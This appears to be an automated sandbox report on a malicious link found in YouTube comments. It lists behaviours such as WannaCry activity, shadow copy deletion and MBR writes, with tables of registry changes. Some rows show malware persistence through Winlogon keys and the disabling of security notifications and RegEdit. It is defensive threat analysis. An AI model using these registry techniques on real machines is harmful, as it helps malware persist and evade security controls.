Analysis Overview
Threat Level: Known bad
The file https://www.youtube.com/redirect?event=comments&redir_token=QUFFLUhqbEdvM2JacWNycElueGhMazlTei16UW9PYmlJQXxBQ3Jtc0treDgtLVJhNUdxbDlBXzVkdEh6a3ZNYkFKMURVVWFha3c3LUhZZk84dUg4Q1VRNFBGOHE4TUJpckxHeHRSN2xaQWhVSU5OQlNMSmNaUHBWbjU1VzBtRi1FdGdEMmZDZFAwQ2NFM0xqYWVPUVZXOHA5RQ&q=https%3A%2F%2Fbit.ly%2F3Trfb6a&stzid=UgzgSIxotTTHMiWttmF4AaABAg was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
Wannacry
Windows security bypass
Deletes shadow copies
Modifies RDP port number used by Windows
Disables RegEdit via registry modification
Blocklisted process makes network request
Downloads MZ/PE file
Sets service image path in registry
Modifies Installed Components in the registry
Drops file in Drivers directory
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
Drops startup file
Checks BIOS information in registry
UPX packed file
Executes dropped EXE
Registers COM server for autorun
Modifies file permissions
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Maps connected drives based on registry
Writes to the Master Boot Record (MBR)
Adds Run key to start application
Enumerates connected drives
Checks installed software on the system
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Modifies registry key
Modifies Internet Explorer start page
Suspicious behavior: AddClipboardFormatListener
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy WMI provider
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Runs net.exe
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: LoadsDriver
System policy modification
Modifies registry class
Delays execution with timeout.exe
Checks SCSI registry key(s)
Enumerates system info in registry
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Script User-Agent
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-24 23:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-24 23:01
Reported
2024-03-24 23:37
Platform
win10v2004-20240226-en
Max time kernel
2094s
Max time network
2010s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" | C:\Users\Admin\Desktop\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe," | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"," | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SHELL = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Wannacry
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Deletes shadow copies
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLEREGISTRYTOOLS = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DISABLEREGISTRYTOOLS = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\DRIVERS\SET961F.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET171.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\mbam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETA35E.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETD8F8.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\drivers\mbae64.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETCC06.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETCC06.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\mbamtestfile.dat | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\mwac.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET1B45.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\MbamChameleon.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET961F.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETE5BB.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETD8F8.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETB050.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET171.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETE72.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\farflt.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETB050.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETE5BB.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETE72.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET1B45.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\mbamswissarmy.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETA35E.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Modifies RDP port number used by Windows
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mbamchameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\WINDOWS\302746537.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDE62D.tmp | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDE634.tmp | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbshlext.dll" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
